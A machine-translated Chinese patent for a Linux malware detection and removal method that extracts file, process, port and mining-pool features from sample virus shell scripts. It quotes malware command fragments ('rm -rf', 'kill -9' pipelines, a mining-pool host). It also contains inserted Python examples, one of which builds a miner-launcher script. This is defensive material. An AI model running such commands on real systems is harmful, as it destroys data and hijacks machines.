It can be understood that, in order to more comprehensively detect viruses in the device to be detected, the set of objects to be detected can be matched with a configuration file, and the configuration file not only includes the first feature item set but also includes the second feature item set, so that the matching range of the objects to be detected in the device to be detected is enlarged, and viruses in the device to be detected can be more comprehensively searched. The first characteristic item set is generated by codes for malicious behavior in the sample shell script, and the second characteristic item set is generated by codes for clearing other viruses in the sample shell script.
It can be understood that, in general, the sample shell script of a certain virus (hereinafter referred to as the first virus) includes two major portions of code. The first major portion is the code for performing malicious behaviour, specifically the code by which the first virus performs its malicious behaviour; the second major portion is the code for clearing other viruses: because viruses are mutually exclusive, the sample shell script of the first virus also contains code for clearing other viruses, and feature items related to viruses other than the first virus can be acquired from that code. The set formed by these feature items is called the second feature item set.
The second feature item set includes at least one of a virus file name feature for clearing other viruses, a virus process name feature for clearing other viruses, a listening port feature, and a communication tool feature.
Further, as shown in fig. 8, a seventh embodiment of the virus killing method according to the present invention is proposed based on the first embodiment, and in this embodiment, the second feature item set includes: the virus file name feature is used for clearing other viruses;
wherein, before step S10, the virus killing method further includes:
S105: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
It can be understood that the sample shell scripts corresponding to the viruses are stored in the history database; when the sample shell scripts in the history database need to be used, they are traversed, and each traversed sample shell script is taken as the current sample shell script. In the following embodiment, the current sample shell script is the one operated on while constructing the second feature item set.
S205: searching a fifth code segment with virus file name characteristics for clearing other viruses from the current sample shell script through a fifth regular expression;
It can be appreciated that after the current sample shell script is obtained, a fifth code segment is searched for in the current sample shell script through a fifth regular expression, where a virus file name feature for clearing other viruses exists in the fifth code segment. For example, a fifth code segment is found through the fifth regular expression 'rm -rf .+', and a fifth character string located after the fifth preset identifier is then intercepted to obtain the corresponding virus file name feature for clearing other viruses. Specifically, the fifth code segment found in the current sample shell script through 'rm -rf .+' is rm -rf /usr/bin/config.json.
S305: extracting a fifth character string positioned after a fifth preset mark from the fifth code segment;
It can be appreciated that, after the fifth code segment is obtained based on the fifth regular expression, a fifth character string located after the fifth preset identifier is further extracted from the fifth code segment. Continuing the above embodiment, when the obtained fifth code segment is rm -rf /usr/bin/config.json, extracting the fifth character string located after the fifth preset identifier gives /usr/bin/config.json; that is, in this embodiment, the fifth preset identifier is -rf, and the extracted fifth character string is /usr/bin/config.json.
S405: and taking the extracted fifth character string as a virus file name feature for clearing other viruses, and adding the virus file name feature for clearing other viruses into a second feature item set.
It should be appreciated that after the fifth string is obtained, the extracted fifth string is used as a virus filename feature for removing other viruses, and the virus filename feature for removing other viruses is added to a second feature item set to form a part of the second feature item set.
Further, as shown in fig. 9, an eighth embodiment of the virus killing method according to the present invention is provided based on the first embodiment, and in this embodiment, the second feature item set includes: the virus process name features are used for eliminating other viruses;
wherein, before step S10, the virus killing method further includes:
S106: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
It can be understood that the sample shell scripts corresponding to the viruses are stored in the history database; when the sample shell scripts in the history database need to be used, they are traversed, and each traversed sample shell script is taken as the current sample shell script. In the following embodiment, the current sample shell script is the one operated on while constructing the second feature item set.
S206: searching a sixth code segment with virus process name characteristics for clearing other viruses from the current sample shell script through a sixth regular expression;
It can be appreciated that after the current sample shell script is obtained, a sixth code segment is searched for in the current sample shell script through a sixth regular expression, where a virus process name feature for clearing other viruses exists in the sixth code segment. For example, a sixth code segment is found through the sixth regular expression 'ps.+|.+xargs kill', and a sixth character string located after the sixth preset identifier is then intercepted to obtain the corresponding virus process name feature for clearing other viruses. Specifically, the sixth code segment found in the current sample shell script through 'ps.+|.+xargs kill' is ps auxf|grep hwlh3wlh lh|awk '{print $2}'|xargs kill -9.
S306: extracting a sixth character string positioned after a sixth preset identifier from the sixth code segment;
It can be appreciated that, after the sixth code segment is obtained based on the sixth regular expression, a sixth character string located after the sixth preset identifier is further extracted from the sixth code segment. Continuing the above embodiment, when the obtained sixth code segment is ps auxf|grep hwlh3wlh lh|awk '{print $2}'|xargs kill -9, extracting the sixth character string located after the sixth preset identifier gives hwlh3wlh lh; that is, in this embodiment, the sixth preset identifier is grep, and the extracted sixth character string is hwlh3wlh lh.
S406: and taking the extracted sixth character string as a virus process name feature for clearing other viruses, and adding the virus process name feature for clearing other viruses into a second feature item set.
It should be appreciated that, after the sixth string is obtained, the extracted sixth string is used as a virus process name feature for removing other viruses, and the virus process name feature for removing other viruses is added to a second feature item set to form a part of the second feature item set.
Further, as shown in fig. 10, a ninth embodiment of the virus killing method according to the present invention is provided based on the first embodiment, and in this embodiment, the second feature item set includes: listening port features;
wherein, before step S10, the virus killing method further includes:
S107: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
It can be understood that the sample shell scripts corresponding to the viruses are stored in the history database; when the sample shell scripts in the history database need to be used, they are traversed, and each traversed sample shell script is taken as the current sample shell script. In the following embodiment, the current sample shell script is the one operated on while constructing the second feature item set.
S207: searching a seventh code segment with a listening port feature from the current sample shell script through a seventh regular expression;
It can be appreciated that after the current sample shell script is obtained, a seventh code segment is searched for in the current sample shell script through a seventh regular expression, where a listening port feature exists in the seventh code segment. For example, a seventh code segment is found through the seventh regular expression 'netstat.+|xargs.+kill', and a seventh character string located after the seventh preset identifier is then intercepted to obtain the corresponding listening port feature. Specifically, the seventh code segment found in the current sample shell script through 'netstat.+|xargs.+kill' is netstat -anp|grep :443|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs -I % kill -9 %.
S307: extracting a seventh character string positioned after a seventh preset identifier from the seventh code segment;
It can be appreciated that, after the seventh code segment is obtained based on the seventh regular expression, a seventh character string located after the seventh preset identifier is further extracted from the seventh code segment. Continuing the above embodiment, when the obtained seventh code segment is netstat -anp|grep :443|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs -I % kill -9 %, extracting the seventh character string located after the seventh preset identifier gives 443; that is, in this embodiment, the seventh preset identifier is grep, and the extracted seventh character string is 443.
S407: obtaining a listening port feature based on the seventh character string, and adding the listening port feature into the second feature item set.
It should be appreciated that after the seventh character string is obtained, a listening port feature is derived based on the seventh character string, and the listening port feature is added to the second feature item set to form a portion of the second feature item set.
Further, deriving the listening port feature based on the seventh character string includes:
judging whether the seventh character string is a preset normal service port or not;
and if not, taking the seventh character string as a listening port feature.
It can be understood that after the seventh character string is obtained, it is first determined whether the seventh character string is a preset normal service port; if so, the seventh character string is not used as a listening port feature, so that the port it represents can keep working normally. If it is not a preset normal service port, the port may be the one the virus uses to communicate with the outside, and the seventh character string is used as the listening port feature. Continuing with the above embodiment, for example, the preset normal service port is 23 and the obtained seventh character string is 443; the seventh character string is not the preset normal service port, and therefore it can be used as a listening port feature.
Further, as shown in fig. 11, a tenth embodiment of the virus killing method according to the present invention is provided based on the first embodiment, and in this embodiment, the second feature item set includes: communication tool features;
wherein, before step S10, the virus killing method further includes:
S108: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
It can be understood that the sample shell scripts corresponding to the viruses are stored in the history database, when the sample shell scripts in the history database need to be used, the sample shell scripts are traversed, the traversed sample shell scripts are used as current sample shell scripts, and in the following embodiment, in the process of constructing the second feature item set, the current sample shell scripts are operated.
S208: searching an eighth code segment with communication tool characteristics from the current sample shell script through an eighth regular expression;
It can be appreciated that after the current sample shell script is obtained, an eighth code segment is searched for in the current sample shell script through an eighth regular expression, where a communication tool feature exists in the eighth code segment. For example, the corresponding communication tool feature can be obtained by searching for an eighth code segment through the eighth regular expression '[a-zA-Z0-9]{1,20}\.[a-zA-Z0-9]{1,20}'. Specifically, the eighth code segment found in the current sample shell script through '[a-zA-Z0-9]{1,20}\.[a-zA-Z0-9]{1,20}' is mine.moneropool.
S308: and taking the eighth code segment as a communication tool feature, and adding the communication tool feature into a second feature item set.
It can be understood that after the eighth code segment is obtained, the eighth code segment is used as a communication tool feature, and the communication tool feature is added to the second feature item set to form part of the second feature item set.
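As an added worked example (not code from the patent or its applicant), the following Python builds the second feature item set from a constructed sample shell script: it takes the seventh string after an assumed "-p" mark and drops preset normal service ports, takes the whole eighth code segment as the communication tool feature, and also collects the fifth and sixth strings (file and process names the script clears). The regular expressions, preset marks, normal-port list and sample script are all assumptions; the eighth pattern uses a dotted token because the page's own pattern is garbled, and it reproduces the stated result mine.moneropool.

```python
import re

# Constructed sample shell script standing in for one entry of the history
# database of virus sample scripts. It is not a real malware sample.
SAMPLE_SHELL_SCRIPT = """\
#!/bin/sh
pkill -f othercoin
rm -f /tmp/othercoin
nohup /tmp/.x/kworkerds -o mine.moneropool -p 443 >/dev/null 2>&1 &
nohup /tmp/.x/kworkerds -o mine.moneropool -p 23 >/dev/null 2>&1 &
"""

# Preset normal service ports (assumed list; the text uses 23 as its example).
NORMAL_SERVICE_PORTS = {"22", "23", "80"}

# Seventh regular expression and seventh preset mark (assumed): the seventh
# code segment is a "-p <port>" option, the seventh string is the port after it.
SEVENTH_RE = re.compile(r"-p\s+(\d{1,5})")

# Eighth regular expression (assumed dotted form, since the page's own pattern
# is garbled); the whole match is the eighth code segment.
EIGHTH_RE = re.compile(r"[a-zA-Z0-9]{1,20}\.[a-zA-Z0-9]{1,20}")

# Fifth and sixth regular expressions (assumed): the file removed and the
# process killed when the sample script clears competing viruses.
FIFTH_RE = re.compile(r"rm\s+-r?f\s+(\S+)")
SIXTH_RE = re.compile(r"pkill\s+-f\s+(\S+)")


def listening_port_features(script):
    """Seventh strings that are not preset normal service ports."""
    features = set()
    for seventh_string in SEVENTH_RE.findall(script):
        if seventh_string in NORMAL_SERVICE_PORTS:
            continue  # a legitimate service port must keep working
        features.add(seventh_string)
    return features


def communication_tool_features(script):
    """Each eighth code segment is taken whole as a communication tool feature."""
    return set(EIGHTH_RE.findall(script))


def other_virus_features(script):
    """(file names, process names) the script clears: fifth and sixth strings."""
    return set(FIFTH_RE.findall(script)), set(SIXTH_RE.findall(script))


def build_second_feature_set(sample_scripts):
    """Traverse the sample shell scripts and accumulate the second feature item set."""
    second = {"file_name": set(), "process_name": set(),
              "listening_port": set(), "communication_tool": set()}
    for current in sample_scripts:  # the traversed script is the current one
        file_names, process_names = other_virus_features(current)
        second["file_name"] |= file_names
        second["process_name"] |= process_names
        second["listening_port"] |= listening_port_features(current)
        second["communication_tool"] |= communication_tool_features(current)
    return second


if __name__ == "__main__":
    for kind, values in build_second_feature_set([SAMPLE_SHELL_SCRIPT]).items():
        print(kind, sorted(values))
```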
In addition, the embodiment of the invention also provides a computer readable storage medium, wherein the computer readable storage medium stores a virus killing program, and the virus killing program realizes the following operations when being executed by a processor:
acquiring a set of objects to be detected in equipment to be detected;
matching the object set to be detected with a first feature item set to obtain a first matching result, wherein the first feature item set is generated based on a sample shell script corresponding to viruses;
and when the first matching result is that the matching is successful, confirming that viruses exist in the equipment to be detected, and clearing the viruses in the equipment to be detected.
Further, the first feature item set includes: virus file path characteristics; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a first code segment with virus file path characteristics from the current sample shell script through a first regular expression;
extracting a first character string positioned behind a first preset identifier from the first code segment;
and obtaining virus file path characteristics based on the first character string, and adding the virus file path characteristics into a first characteristic item set.
Further, the virus killing program when executed by the processor further realizes the following operations:
judging whether the first character string contains preset characters or not;
if the first character string contains the preset character, taking the first character string as a virus file path characteristic;
if the first character string does not contain the preset character, converting the first character string to obtain a converted first character string, and taking the converted first character string as a virus file path characteristic.
Further, the first feature item set includes: virus process name characteristics; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a second code segment with virus process name characteristics from the current sample shell script through a second regular expression;
extracting a second character string positioned behind a second preset mark from the second code segment;
and taking the extracted second character string as a virus process name characteristic, and adding the virus process name characteristic into the first characteristic item set.
Further, the first feature item set includes: timing task features; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a third code segment with timing task characteristics from the current sample shell script through a third regular expression;
extracting a third character string positioned between third preset identifiers from the third code segment;
and taking the extracted third character string as a timing task feature, and adding the timing task feature into the first feature item set.
Further, the first feature item set includes: network connection tool features; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a fourth code segment with network connection tool characteristics from the current sample shell script through a fourth regular expression;
extracting a fourth character string positioned between fourth preset identifiers from the fourth code segment;
and taking the extracted fourth character string as a network connection tool feature, and adding the network connection tool feature into the first feature item set.
Further, the virus killing program when executed by the processor further realizes the following operations:
matching the object set to be detected with a configuration file, wherein the configuration file comprises a first characteristic item set and a second characteristic item set, the first characteristic item set is generated by codes for malicious behavior in a sample shell script, and the second characteristic item set is generated by codes for clearing other viruses in the sample shell script.
Further, the second set of feature items includes: the virus file name feature is used for clearing other viruses; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a fifth code segment with virus file name characteristics for clearing other viruses from the current sample shell script through a fifth regular expression;
extracting a fifth character string positioned after a fifth preset mark from the fifth code segment;
and taking the extracted fifth character string as a virus file name feature for clearing other viruses, and adding the virus file name feature for clearing other viruses into a second feature item set.
Further, the second set of feature items includes: the virus process name features are used for eliminating other viruses; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a sixth code segment with virus process name characteristics for clearing other viruses from the current sample shell script through a sixth regular expression;
extracting a sixth character string positioned after a sixth preset identifier from the sixth code segment;
and taking the extracted sixth character string as a virus process name feature for clearing other viruses, and adding the virus process name feature for clearing other viruses into a second feature item set.
Further, the second set of feature items includes: monitoring port characteristics; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a seventh code segment with a monitoring port characteristic from the current sample shell script through a seventh regular expression;
extracting a seventh character string positioned after a seventh preset mark from the seventh code segment;
and obtaining a monitoring port feature based on the seventh character string, and adding the monitoring port feature into a second feature item set.
Further, the virus killing program when executed by the processor further realizes the following operations:
judging whether the seventh character string is a preset normal service port or not;
and if not, taking the seventh character string as a monitoring port characteristic.
Further, the second set of feature items includes: communication tool features; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching an eighth code segment with communication tool characteristics from the current sample shell script through an eighth regular expression;
and taking the eighth code segment as a communication tool feature, and adding the communication tool feature into a second feature item set.
Further, the virus killing program when executed by the processor further realizes the following operations:
and removing objects successfully matched with the first characteristic item set in the object set to be detected in the equipment to be detected.
Further, after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, the virus killing program further realizes the following operations when being executed by the processor:
judging whether the current sample shell script is in an encrypted state or not;
and if the judgment result is that the current sample shell script is in the encrypted state, decrypting the current sample shell script.
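The detection side of the above operations, as an added example that is not the patent's program: a constructed configuration file holds both feature item sets, the object set collected from the device is matched against it, a virus is confirmed only on a first-set match, and exactly those matched objects are cleared (simulated here by removing them from the object set). The configuration layout, object kinds and values, and the cron-entry matching rule are assumptions.

```python
# Constructed configuration file: the first feature item set comes from the
# sample script's own malicious behaviour, the second from the code with which
# it clears other viruses. All values are constructed, not the patent's own.
CONFIG = {
    "first": {
        "file_path": {"/tmp/.x/kworkerds"},
        "process_name": {"kworkerds"},
        "timing_task": {"/tmp/.x/kworkerds"},  # command part of a cron entry
    },
    "second": {
        "file_name": {"othercoin"},
        "process_name": {"othercoin"},
        "listening_port": {"443"},
        "communication_tool": {"mine.moneropool"},
    },
}

# Constructed object set collected from the device to be detected:
# (kind, value) pairs, one kind per feature category.
OBJECTS_TO_DETECT = [
    ("file_path", "/tmp/.x/kworkerds"),
    ("file_path", "/usr/sbin/sshd"),
    ("process_name", "kworkerds"),
    ("process_name", "sshd"),
    ("timing_task", "*/10 * * * * /tmp/.x/kworkerds >/dev/null 2>&1"),
    ("timing_task", "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf"),
    ("listening_port", "443"),
]


def object_matches(kind, value, feature_set):
    """An object matches when its value equals a feature of the same kind.
    Cron entries match when their command field contains the timing task
    feature (assumed rule: a live crontab line also carries the schedule and
    redirections that the feature extracted from the sample lacks)."""
    features = feature_set.get(kind, set())
    if kind == "timing_task":
        command = " ".join(value.split()[5:])  # drop the five schedule fields
        return any(feature in command for feature in features)
    return value in features


def match_feature_set(objects, feature_set):
    """Objects of the object set that match the given feature item set."""
    return [(k, v) for k, v in objects if object_matches(k, v, feature_set)]


def detect(objects, config):
    """Virus present only when the first feature item set matches; second-set
    hits are reported as corroboration and never cleared on their own."""
    first_hits = match_feature_set(objects, config["first"])
    second_hits = match_feature_set(objects, config["second"])
    return {"virus_present": bool(first_hits),
            "to_clear": first_hits,
            "corroborating": second_hits}


def clear_matched(objects, to_clear):
    """Simulated clearing: the object set without the first-set matches. A real
    program would delete the file, kill the process and drop the cron entry."""
    return [obj for obj in objects if obj not in to_clear]


if __name__ == "__main__":
    result = detect(OBJECTS_TO_DETECT, CONFIG)
    print("virus present:", result["virus_present"])
    for obj in result["to_clear"]:
        print("clear:", obj)
    print("remaining:", clear_matched(OBJECTS_TO_DETECT, result["to_clear"]))
```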
According to the method, the object set to be detected is matched with the first feature item set generated from the sample shell script corresponding to the virus, and when the matching succeeds, the virus in the device to be detected is cleared. In this way the virus can be found quickly and comprehensively, accurate virus searching and killing is achieved, and the technical problem that a virus is repeatedly reinfected and cannot be thoroughly removed is effectively solved.
It should be noted that, in this document, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or system that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or system. Without further limitation, an element defined by the phrase "comprising one … …" does not exclude the presence of other like elements in a process, method, article, or system that comprises the element.
The foregoing embodiment numbers of the present invention are merely for the purpose of description, and do not represent the advantages or disadvantages of the embodiments.
From the above description of the embodiments, it will be clear to those skilled in the art that the method of the above embodiments may be implemented by means of software plus a necessary general hardware platform, and of course may also be implemented by means of hardware, but in many cases the former is the preferred embodiment. Based on such understanding, the technical solution of the present invention, essentially or in the part contributing to the prior art, may be embodied in the form of a software product stored in a storage medium (e.g. ROM/RAM, magnetic disk, optical disk) as described above, including several instructions for causing a server (which may be a mobile phone, a computer, a server, an air conditioner, or a network device, etc.) to perform the method according to the embodiments of the present invention.
The foregoing description is only of the preferred embodiments of the present invention, and is not intended to limit the scope of the invention, but rather is intended to cover any equivalents of the structures or equivalent processes disclosed herein or in the alternative, which may be employed directly or indirectly in other related arts.

Claims (14)

1. A virus killing method, characterized by comprising the following steps:
acquiring an object set to be detected in equipment to be detected, wherein the equipment to be detected is equipment needing Linux virus detection;
matching the object set to be detected with a first feature item set to obtain a first matching result, wherein the first feature item set is generated based on a sample shell script corresponding to viruses;
when the first matching result is that the matching is successful, the virus exists in the equipment to be detected, and the virus in the equipment to be detected is cleared;
the first feature item set includes: virus file path characteristics;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a first code segment with virus file path characteristics from the current sample shell script through a first regular expression;
extracting a first character string positioned behind a first preset identifier from the first code segment;
obtaining virus file path characteristics based on the first character string, and adding the virus file path characteristics into a first characteristic item set;
The deriving virus file path characteristics based on the first string includes,
judging whether the first character string contains preset characters or not;
if the first character string contains the preset character, taking the first character string as a virus file path characteristic;
if the first character string does not contain the preset character, converting the first character string to obtain a converted first character string, and taking the converted first character string as a virus file path characteristic.
2. The virus killing method of claim 1, wherein the first set of feature items comprises: virus process name characteristics;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a second code segment with virus process name characteristics from the current sample shell script through a second regular expression;
extracting a second character string positioned behind a second preset mark from the second code segment;
and taking the extracted second character string as a virus process name characteristic, and adding the virus process name characteristic into the first characteristic item set.
3. The virus killing method of claim 1, wherein the first set of feature items comprises: timing task features;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a third code segment with timing task characteristics from the current sample shell script through a third regular expression;
extracting a third character string positioned between third preset identifiers from the third code segment;
and taking the extracted third character string as a timing task feature, and adding the timing task feature into the first feature item set.
4. The virus killing method of claim 1, wherein the first set of feature items comprises: network connection tool features;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a fourth code segment with network connection tool characteristics from the current sample shell script through a fourth regular expression;
extracting a fourth character string positioned between fourth preset identifiers from the fourth code segment;
and taking the extracted fourth character string as a network connection tool feature, and adding the network connection tool feature into the first feature item set.
5. The method of claim 1, wherein said matching the set of objects to be detected with the first set of feature items comprises,
matching the object set to be detected with a configuration file, wherein the configuration file comprises a first characteristic item set and a second characteristic item set, the first characteristic item set is generated by codes for malicious behavior in a sample shell script, and the second characteristic item set is generated by codes for clearing other viruses in the sample shell script.
6. The virus killing method of claim 5, wherein the second set of feature items comprises: the virus file name feature is used for clearing other viruses;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a fifth code segment with virus file name characteristics for clearing other viruses from the current sample shell script through a fifth regular expression;
extracting a fifth character string positioned after a fifth preset mark from the fifth code segment;
and taking the extracted fifth character string as a virus file name feature for clearing other viruses, and adding the virus file name feature for clearing other viruses into a second feature item set.
7. The virus killing method of claim 5, wherein the second set of feature items comprises: the virus process name features are used for eliminating other viruses;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a sixth code segment with virus process name characteristics for clearing other viruses from the current sample shell script through a sixth regular expression;
extracting a sixth character string positioned after a sixth preset identifier from the sixth code segment;
and taking the extracted sixth character string as a virus process name feature for clearing other viruses, and adding the virus process name feature for clearing other viruses into a second feature item set.
8. The virus killing method of claim 5, wherein the second set of feature items comprises: monitoring port characteristics;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a seventh code segment with a monitoring port characteristic from the current sample shell script through a seventh regular expression;
extracting a seventh character string positioned after a seventh preset mark from the seventh code segment;
and obtaining a monitoring port feature based on the seventh character string, and adding the monitoring port feature into a second feature item set.
9. The virus killing method of claim 8, wherein said obtaining a monitoring port feature based on said seventh character string comprises,
judging whether the seventh character string is a preset normal service port or not;
and if not, taking the seventh character string as a monitoring port characteristic.
10. The virus killing method of claim 5, wherein the second set of feature items comprises: communication tool features;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching an eighth code segment with communication tool characteristics from the current sample shell script through an eighth regular expression;
and taking the eighth code segment as a communication tool feature, and adding the communication tool feature into a second feature item set.
11. The virus killing method according to any one of claims 1 to 10, wherein the clearing of the virus in the device to be detected comprises,
and removing objects successfully matched with the first characteristic item set in the object set to be detected in the equipment to be detected.
12. The virus killing method according to any one of claims 2 to 4 and 6 to 10, wherein, after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, the method further comprises,
judging whether the current sample shell script is in an encrypted state or not;
and if the judgment result is that the current sample shell script is in the encrypted state, decrypting the current sample shell script.
13. A virus killing device, characterized in that the virus killing device comprises: a memory, a processor and a virus killing program stored on the memory and executable on the processor, the virus killing program configured to implement the steps of the virus killing method of any one of claims 1 to 12.
14. A computer-readable storage medium, wherein a virus killing program is stored on the computer-readable storage medium, which when executed by a processor, implements the steps of the virus killing method according to any one of claims 1 to 12.
CN202010578310.7A 2020-06-22 2020-06-22 Virus checking and killing method and device and computer readable storage medium Active CN111723372B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202010578310.7A CN111723372B (en) 2020-06-22 2020-06-22 Virus checking and killing method and device and computer readable storage medium

Publications (2)

Publication Number Publication Date
CN111723372A CN111723372A (en) 2020-09-29
CN111723372B true CN111723372B (en) 2024-02-23

Family

ID=72568284

Country Status (1)

Country Link
CN (1) CN111723372B (en)

Citations (10)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101340680A (en) * 2008-08-12 2009-01-07 深圳华为通信技术有限公司 Method and apparatus for implementing virus defending and virus killing by bi-core terminal
CN104281809A (en) * 2014-09-30 2015-01-14 北京奇虎科技有限公司 Method, device and system for searching and killing viruses
CN104318161A (en) * 2014-11-18 2015-01-28 北京奇虎科技有限公司 Virus detection method and device for Android samples
CN104318160A (en) * 2014-10-29 2015-01-28 北京奇虎科技有限公司 Malware searching and killing method and device
CN106709341A (en) * 2016-06-30 2017-05-24 腾讯科技(深圳)有限公司 Virus processing method and device capable of aiming at file package
CN106709340A (en) * 2016-06-29 2017-05-24 腾讯科技(深圳)有限公司 Virus killing method and device
CN109344615A (en) * 2018-07-27 2019-02-15 北京奇虎科技有限公司 A kind of method and device detecting malicious commands
CN110362994A (en) * 2018-03-26 2019-10-22 华为技术有限公司 Detection method, equipment and the system of malicious file
CN110717183A (en) * 2019-12-09 2020-01-21 深信服科技股份有限公司 Virus checking and killing method, device, equipment and storage medium
CN110837640A (en) * 2019-11-08 2020-02-25 深信服科技股份有限公司 Malicious file searching and killing method, device, storage medium and device

Family Cites Families (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
RU2568285C2 (en) * 2013-09-30 2015-11-20 Закрытое акционерное общество "Лаборатория Касперского" Method and system for analysing operation of software detection rules

Non-Patent Citations (2)

* Cited by examiner, † Cited by third party
Title
Lin Peng. Internet Security Construction from 0 to 1. China Machine Press, 2020, pp. 83-84. *
Ma Jianfeng. Information Security. Xidian University Press, 2013, p. 307. *

Also Published As

Publication number Publication date
CN111723372A (en) 2020-09-29

Legal Events

Code Title
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant